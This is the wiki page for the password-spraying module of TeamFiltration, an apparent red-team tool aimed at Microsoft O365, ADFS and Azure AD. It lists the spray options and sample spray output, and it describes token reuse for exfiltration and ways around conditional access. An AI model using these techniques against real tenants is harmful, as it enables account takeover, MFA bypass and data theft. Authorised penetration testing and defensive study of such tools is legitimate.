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Melvin L edited this page Nov 8, 2023 · 8 revisions

TeamFiltration's spray module provides password spraying capabilities for Microsoft O365 tenants (both non-gov and gov), as well as ADFS.

   --spray       Load the spraying module

         --aad-sso             Use SecureWork's Azure Active Directory password brute-forcing vuln for spraying
         --us-cloud            When spraying companies attached to US Tenants (
         --time-window         Defines a time windows where spraying should accour, in the military time format <12:00-19:00>
         --passwords           Path to a list of passwords, common weak-passwords will be generated if not supplied
         --seasons-only        Password genersated for spraying will only be based on seasons
         --months-only         Password generated for spraying will only be based on months
         --common-only         Spray with the top 20 most common passwords
         --combo               Path to a combolist of username:password
         --exclude             Path to a list of emails to exclude from spraying

         --sleep-min           Minimum minutes to sleep between each full rotation of spraying default=60
         --sleep-max           Maximum minutes to sleep between each full rotation of spraying default=100
         --delay               Delay in seconds between each individual authentication attempt. default=0
         --push                Get Pushover notifications when valid credentials are found (requires pushover keys in config)
         --push-locked         Get Pushover notifications when an sprayed account gets locked (requires pushover keys in config)
         --force               Force the spraying to proceed even if there is less the <sleep> time since the last attempt

By default, TeamFiltration will pull and target the validated emails from the local database for password spraying. If no password list is provided using the --passwords argument, a series of commonly used passwords based on the Month, Season, and year will be automagically generated. You can also choose to generate either of them specifally using --seasons-only, --months-only or --common-only.

[♥] TeamFiltration VX.X.X PUBLIC, created by @Flangvik at @TrustedSec
[+] Args parsed --outpath F:\Dev\skywalker --config F:\Dev\config.txt --spray
[+] AWS SecretKey and AccessKey found, FireProx endpoint will be automagically created for each spray-rotation
[SPRAY] 23.01.2023 06:55:24 EST Sleeping between 60-100 minutes for each round
[FIREPROX] 23.01.2023 06:55:28 EST Created endpoint
[SPRAY] us-west-1 23.01.2023 06:55:30 EST Sprayed [email protected]:January2023          => INVALID
[SPRAY] us-west-1 23.01.2023 06:55:30 EST Sprayed [email protected]:January2023              => INVALID
[SPRAY] us-west-1 23.01.2023 06:55:30 EST Sprayed [email protected]:January2023        => INVALID
[SPRAY] us-west-1 23.01.2023 06:55:31 EST Sprayed [email protected]:January2023      => INVALID
[SPRAY] us-west-1 23.01.2023 06:55:31 EST Sprayed [email protected]:January2023              => INVALID
[SPRAY] us-west-1 23.01.2023 06:55:31 EST Sprayed [email protected]:January2023           => INVALID
[FIREPROX] 23.01.2023 06:55:32 EST Deleted endpoint

When a valid set of credentials is found, TeamFiltration will store it's access token in the database, upon successful login. The account will also be excluded from all future spraying attempts

This access token, together with the accompanying refresh token, is used when performing the exfiltration of data through the exfiltration module. This allows TeamFiltration to avoid creating unnecessary interactive login when moving into the post-exploitation phase.

Conditional Access

If a valid set of credentials is found, but the login attempt was blocked due to MFA or other restrictions enforced by conditional access. TeamFiltration will store the valid credentials in the database, and when targeted in the exfiltration module, identify a gap in the policies(s) by brute-forcing a series of login combinations with unique combinations on Resources URI, ClientId, and Device.

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